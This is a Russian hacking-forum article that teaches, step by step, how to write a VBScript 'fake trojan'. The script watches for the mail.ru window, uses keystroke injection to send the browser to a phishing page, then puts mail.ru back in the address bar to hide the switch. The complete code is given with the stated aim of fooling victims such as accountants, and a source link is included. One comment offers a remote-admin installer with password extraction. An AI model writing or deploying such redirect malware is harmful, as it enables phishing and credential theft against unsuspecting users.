ФЕйк троян v 2.0 своими руками — HackZona.Ru

ФЕйк троян v 2.0 своими руками

ФЕйк троян v 2.0 своими руками

Тип статьи:
Со старой ХакЗоны.
Hi all! С вами kazin8 из -=Unlock Team-=, и после некоторого простоя раздела Статьи на нашем www.untm.tk я решил кое что написать)

Сегодня мы напишем фейк троян, который будет подменять любую страницу (по нашему желанию)) на любую другую (опять же хозяин барин)). Писать будем на vbs и как пример будет нами столь любимый www.mail.ru) Для чего это надо? Это будет прекрасным фундаментом для ваших фейков. Может какого нибудь продвинутого банкира вы своим фейком на webmoney и не обманите, а вот бухгалтеры попадутся в легкую))) Начнем, пожалуй.

1. Инструменты
Как вы наверное знаете, vbs — это язык сценариев Windows и для него ничего кроме блокнота и прямых рук не нужно. Но мы, я надеюсь, не извращенцы, и будем использовать инструмент под названием primalscript. Посмотрите здесь www.crackz.su/patches/419-23-primalscript-2007-enterprise-v4-5-559.html, но если что у вас всегда есть гугл) Так же нам понадобится немного знать vbs. Сразу говорю статья будет не из коротких. Ленивые могут взять сорс в конце, но хорошо работать он у вас не будет!!! Хоть сначала материал и покажется сложным, статья сугубо для новичков, ибо я сам тот еще новайс)

2. Алгоритм
Сам алгоритм будет немного непонятен на словах. Следим за моими словами. Первым делом наш скрипт отслеживает, не зашел ли человек на www.mail.ru? Это делается посредством отлавливания заголовка (он же title). Следующий шаг передача адресной строке нужного нам адреса, передача клавиши enter, и, наконец, передача строке адреса первоначальной страницы, но уже без перехода на нее. Это для снятия палева. Сразу говорю, фейк далек от идеала, но вы можете добиваться все лучшей и лучшей его настройки. Потом скажу как.

3. VBS
Ну что, кто читал мою статью о wsh, тот должен понять почти все, что я буду делать. Но объяснять я все же, буду подробно. Начнем конечно с объявления разных переменных, нужных нам.

Option Explicit Это говорит о разделе переменных. Не дает использовать «левые» переменные
On Error Resume Next Пропуск ошибок. Зачем скрытому фейку видимая реакция на ошибки:?
Dim fso, userdir, wshshell,yes Объявление нужных переменных
Set wshshell = WScript.CreateObject(«WScript.Shell») создаем объект для работы с окружением винды, ему мы и будем передавать клавиши
Set fso = WScript.CreateObject («Scripting.FileSystemObject») Объект для работы с файловой системой.
userdir = WSHShell.ExpandEnvironmentStrings("%userprofile%")Получаем в userdir адрес текущего юзера винды.
Opera = userdir+«Application DataOpera» Получаем путь к директории оперы в Application Data
FireFox = userdir +«Application DataMozillaFirefox» Получаем путь к директории Огнелиса в Application Data
yes = 0 некая логическая переменная)

Ну а теперь нормальные пояснения. Получение директорий оперы и огнелиса нам нужны для того, чтобы хотя бы приблизительно сказать, каким браузером пользуется жертва. Почему мы определяем не в Program Files? Да потому что каждая версия имеет свое имя папки там) Идем дальше. Что собственно за yes? Эта переменная будет служить нам для определения, есть ли на компе firefox или опера, или они сразу вместе? Или их вообще нет? Так же она поможет сократить конструкцию самого главного алгоритма. Пора переходить к следующему куску кода, который, собственно, и объяснит переменную yes)

If FSO.FolderExists(Opera) Or FSO.FolderExists(firefox) Then Если есть опера или лис то
yes = 1
Else If FSO.FolderExists(Opera) And FSO.FolderExists(firefox) Then Если есть и то и другое то
yes = 2
End If
End If

Поясняю) FSO.FolderExists(DirName) возвращает true когда директория существует и false когда ее нет. Or оператор или. То есть, если существует только одна директория оперы или огнелиса, то yes = 1. А если существуют обе директории, то yes = 2. А если их вообще нет, yes так и останется 0. Теперь самый большой кусок. И последний.

do while 1=1 Цикл пока 1=1 делать. То есть бесконечно)
If yes = 1 Or 2 then Если yes <> 0 можно заменить if yes>0 then
If WshShell.AppActivate (@MAIL.RU: почта, новости, работа, рассылки, развлечения. Почта @MAIL.RU — бесплатная почта #1") Then Если активно окно с mail.ru то
wshshell.SendKeys "^L" Горячая клавиша перехода на адресную строку. Ctrl+L
wshshell.SendKeys «цццюрфлукыгззщкеюкг» Передаем строке www.hakersupport.ru русскими буквами
wshshell.SendKeys "~" Символ соответствует нажатию enter
WScript.Sleep 2000 Ждем 2 секунды
wshshell.SendKeys "^L" На всякий случай опять активизируем адресную строку
wshshell.SendKeys «цццюьфшдюкг» пишем в ней www.mail.ru русскими буквами
WScript.Sleep 1000 Отдыхаем 1 сек.
wshshell.SendKeys "{ESC}" Сбрасываем выделение
End If
Else Если yes = 0, то есть в системе только ie (ну или chrome. Его я не стал учитывать)
If WshShell.AppActivate (@MAIL.RU: почта, новости, работа, рассылки, развлечения. Почта @MAIL.RU — бесплатная почта #1") Then
wshshell.SendKeys "^L"
wshshell.SendKeys " цццюрфлукыгззщкеюкг "
wshshell.SendKeys "~"
WScript.Sleep 2000
wshshell.SendKeys " цццюьфшдюкг "
WScript.Sleep 1000
wshshell.SendKeys "{ESC}"
End If
End If
loop

Мда. Написано много, а понять не очень получается. Буду разъяснять. Начнем с того момента, когда проверка yes > 0 дает положительный результат, то есть пользуются скорее всего не ie. If WshShell.AppActivate вот эта волшебная функция следит, когда в «строке заголовка программы» появится заданный ей параметр. Но ведь строка заголовка в браузере равна title страницы, заруженной в нем!_) Воспользуемся этим. Title mail.ru всем известен. Идем дальше. Когда мы получили титл, то есть человек загрузил mail мы посылаем браузеру сочетания клавиш Ctrl + L (горячие клавиши для выделения адресной строки)). Так строку выделили. Теперь надо бы послать нужный нам адрес. Но Ведь если человек написал www.mail.ru значит его раскладка стоит на русском. Поэтому русские буквы будут писаться на англ) пользуемся) Написали Теперь шлем Enter) (символ ~). Теперь подождем пока браузер загрузит подставную страницу. Теперь на всякий случай повторим выделение строки и напишем там www.mail.ru, опять же русскими буквами. Так. Теперь хорошо бы снять выделение. Посылаем нажатие клавиши Escape. Вот и все.
Для ie тоже, но без повторного выделения, ибо ИА не выделяет строку а открывает новое окно для ввода.

4. Лирическое отступление.
Как ты смог заметить. Фейк далек от идеала Но все в твоих силах. Сейчас я честно перечислю его проблемы. Во-первых, проблема в том, что ИА самый ублюдский браузер (Извини билли). Он на столько медленный, что когда у мя падает интернет, то я даже этого не замечаю, на столько долго грузит ИА. Если честно, на нем я заразу не тестировал Ибо у меня его нет))) Прошу всех кто может, попробовать добиться идеального соотношения времени. Во-вторых, в опере есть баг, по крайне мере в 9. Сколько бы раз я ей не передавал Escape, она не хочет снимать выделение. Ну баг не самый страшный. А вот firefox показал себя просто как Медведев в разговоре с Саакашвили) Быстро, четко. Я рад за огнелиса)
Ну и наконец, главная просьба. Понимаете, у людей разные скорости подключения и время может быть разным. Прошу вас тестить этот фейк у себя, менять значения Sleep на большие или меньшие, и когда вы добьетесь лучшего результата, пожалуйста напишите в комментах скорость подключения и величину Sleep))))
Спасибо всем, кто все же прочитал это бред. С вами был kazin8 -=Unlock Team=-
Великих вам взломов и удачи! (Помните, 243 статья уголовного кодекса карает создание и распространение вредоносных программ. Статья написана лишь для ознакомления БЛА БЛА БЛА))).

Сорс — unlock-team.ucoz.ru/load/9-1-0-43
Нравится
Не нравится

6 комментариев

05:05
инсталер RADMIN + вытаскивание паролей от системы windows xp + инфа по теме и не очень
17:49
Оригинальная идея..)Отлично!
02:38
грифон ты урод вирусняк покнул((
02:41
грфон ты вирус покнул.?
22:32
молодец...идея супер)))
20:16
Вирус !!!!